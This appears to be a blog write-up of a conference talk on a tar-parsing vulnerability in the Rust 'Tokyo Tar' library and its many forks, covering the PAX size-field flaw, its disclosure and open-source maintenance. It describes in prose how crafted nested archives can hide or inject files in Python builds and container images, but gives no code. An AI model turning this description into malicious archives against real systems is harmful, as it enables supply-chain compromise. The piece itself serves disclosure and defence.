Presenters

Source

The Unseen Dangers in Open Source: A Deep Dive into a Critical Tar Bug ๐Ÿ›๐Ÿ’ป

Hey tech enthusiasts! ๐Ÿ‘‹ Ever wonder what lurks beneath the surface of the open-source software you use every day? Today, we’re diving deep into a fascinating, albeit slightly terrifying, bug that Marina Moore (Head of Research at Ada) and Alex Zenla (CTO of Ada) stumbled upon. This isn’t just about a single bug; it’s a journey into the intricate world of software supply chain security, the complexities of open-source ecosystems, and the often-overlooked responsibilities of project maintainers. ๐Ÿš€

The Case of the Confusing Tar File ๐Ÿ“‚โ“

It all started innocently enough. Alex and his colleague Stephen were working on their platform, specifically with OCI images, aiming to pull some benchmarks. Suddenly, things went haywire. Their tool was extracting files that, quite frankly, didn’t exist in the tar file. This was a perplexing and unexpected behavior.

“If you’re extracting files from a dar file that don’t exist, something really bad must have happened,” Alex realized.

Digging deeper, they discovered that the tar library they were using was also extracting nested tar files within the main one, all with a single extraction command. This was not how tar files were supposed to behave!

The Culprit: Tokyo Tar and a Dangerous Bug ๐Ÿ’ฅ

The library in question was Tokyo Tar, a popular asynchronous tar library for Rust. The bug was particularly nasty: when encountering a tar file formatted in a specific way inside another tar file, Tokyo Tar would mistakenly parse the inner tar file as part of the root tar.

This bug had a severity rating of 8.1, with the potential for remote code execution when combined with other tools. The panic intensified when Alex discovered that this vulnerable library was used by incredibly popular tools like UV (from Astral), WSL, and cloud test containers. The impact was far beyond just their team.

Understanding the Tar Threat: A Blast from the Past ๐Ÿ’พ๐Ÿ•ฐ๏ธ

To grasp the vulnerability, we need a quick primer on tar files. These have been around since the late 70s/early 80s and form the backbone of OCI images. A tar file is a linear archive with file headers and file data. A key element is the read size field in the header, indicating the size of the file data.

The vulnerability exploits a mechanism called PAX, a POSIX-standardized extension to tar. PAX allows for more complex metadata, including the ability to represent files larger than the standard tar format. The issue arises when this mechanism is not correctly implemented.

The Mechanics of the Exploit โš™๏ธ

Here’s the crux of the problem:

  • PAX and USTAR: When using USTAR (which piggybacks on the standard tar format), if a PAX size field is set to indicate an extended file size, it must be set to zero.
  • The Flaw: If a tar parser is not PAX-aware, it might ignore this zero PAX size field and incorrectly advance by zero bytes. This allows the parser to then read the subsequent file data as if it were another tar file.
  • Masquerading Data: Crucially, the vulnerability didn’t require the nested file to be a tar file; it just needed to appear like one to the parser. This allowed for data to be masqueraded, leading to differential parsing bugs. Different tools could see different sets of files within the same archive.

Attack Scenarios: From Python Builds to Container Images ๐Ÿ˜ˆ

The implications of this bug are significant:

  • Python Build and Hijacking: Imagine a scenario where a malicious actor crafts a tar file for a Python package. When tools like UV extract this tar, the bug could inject hidden files or overwrite critical manifest files, potentially leading to arbitrary code execution on developer machines. Malware scanners, if not PAX-aware, might not even detect these hidden threats.
  • Container Image Poisoning: Similarly, a crafted container image could appear valid during scanning but contain injected tar files. Upon extraction, these could lead to different executables being run, turning a trusted image into a vector for malware.
  • Bypassing Manifests and Bills of Materials: The ability to manipulate how files are parsed can be used to fake manifests or bills of materials, creating a deceptive view of the container’s contents and enabling arbitrary code execution.

The Forking Nightmare: A Cascading Problem ๐ŸŒณ๐Ÿ”„๐ŸŒณ

What made this bug particularly challenging to fix was its presence across multiple forks of the original tar library. The lineage looked something like this:

  1. tar (Rust ecosystem)
  2. Asynchronous tar library (forked from tar)
  3. tokyo-tar (forked from async tar, forked to work with Tokyo)
  4. crowded-tokyo (forked from tokyo-tar because it was unmaintained)
  5. astral-tokyo (forked from crowded-tokyo by Astral)

Every single one of these forks inherited the same bug! This created a complex web of dependencies where numerous projects, including the widely used UV, bentock, and opoam, were vulnerable. A scan revealed over 120 packages on crates.io using one of these vulnerable versions.

The Disclosure Dilemma: No Single Upstream ๐ŸคโŒ

The disclosure process was a Herculean effort. There was no single upstream to patch. Alex and Marina had to:

  • Contact Multiple Maintainers: This involved extensive “soothing” โ€“ digging through commit emails, relying on “friend of a friend” connections, and even investigating deprecated projects.
  • Develop Multiple Patches: Patches had to be developed for each individual fork, and some diverged significantly.
  • Coordinate a 60-Day Embargo: This was a tight deadline to get fixes out.
  • Take on Extra Responsibility: Since many maintainers were unresponsive or unavailable, Ada effectively stepped in to manage the disclosure and patching process for the broader community.
  • Notify Downstream Users: They proactively informed impacted downstream projects like Astral and UV, even before the embargo lifted, due to the bug’s significant impact.

Huge props go to Astral and UV for their responsiveness, existing security policies, and active participation in the disclosure.

The Open Source Ecosystem: Questions and Reflections ๐Ÿค”๐Ÿ’ก

This experience illuminated several critical questions about the open-source landscape:

Who Do You Disclose To? ๐Ÿ“ข

When a project isn’t actively maintained or doesn’t know its users, who is responsible for notifying them? The lines blur between notifying the project maintainer and directly informing the downstream users who are ultimately affected.

What Does it Mean to Be an Open Source Project? ๐ŸŒ

Open source exists on a spectrum. From robust, foundation-backed projects to personal hobby projects, the expectations regarding maintenance, responsiveness, and security differ vastly. Clarifying this spectrum upfront is crucial.

Why Do Projects Get Forked? ๐ŸŒณ

Forks arise from unmaintained upstreams, specific use-case needs, or disagreements in project direction. While a benefit of open code, it can lead to user confusion about which version to trust and maintain.

The Unmaintained Reality ๐Ÿ“‰

A staggering half of open-source projects go unmaintained within four years. Factors like a strong community and organizational support significantly impact a project’s longevity.

Responsibility for Bugs: A Two-Way Street ๐Ÿšฆ

Users expect security fixes, but maintainers have varying levels of commitment. The license dictates usage, but not necessarily supportability. A clear declaration of a project’s support level (e.g., “will fix bugs,” “accepting patches,” “hobby project”) is vital.

Reporter’s Responsibility: How Far Do You Go? ๐Ÿ”Ž

When a bug is found, how much effort should the reporter invest? Should they be expected to write patches, investigate severity, or track down downstream users? Supporting those who want to do the right thing is key.

Making Open Source More Sustainable and Secure ๐ŸŒฑ๐Ÿ› ๏ธ

To address these challenges, Ada proposes actionable steps:

  1. Declare Your Project’s Support Plan: Be transparent in your README about bug fixing, vulnerability reporting, and contact methods.
  2. Maintain a security.md File: A standardized place for security-related information, making it easy for reporters to find and submit issues. Crucially, monitor the channels you provide!
  3. Make Open Source Sustainable: Encourage funding, contributions, and community support to ensure projects remain maintained and secure. When thousands of users rely on a project, they should contribute to its upkeep.

The Aftermath: Patches, Archiving, and a Call to Action ๐Ÿ“ขโœจ

Ultimately, the tokyo-tar bug was patched in some forks, notably by Astral. However, tokyo-tar itself remains unmaintained, with no responses to outreach. Ada developed and shared their own patch for it, recommending users migrate to a more actively maintained fork.

To prevent future confusion, Ada archived their fork (crowded-tokyo) and encouraged users to coalesce around Astral Tokyo, which was patched.

Even with these efforts, a few projects still use older, vulnerable versions of tokyo-tar. If you know anyone using it, please let them know! ๐Ÿ™

This entire experience highlights the critical need for better communication, clearer expectations, and more sustainable practices within the open-source community. By working together, we can build a more secure and reliable digital future for everyone.

Thank you for joining us on this deep dive! Stay curious, stay safe, and keep contributing to a better open-source world! ๐ŸŒโค๏ธ

Appendix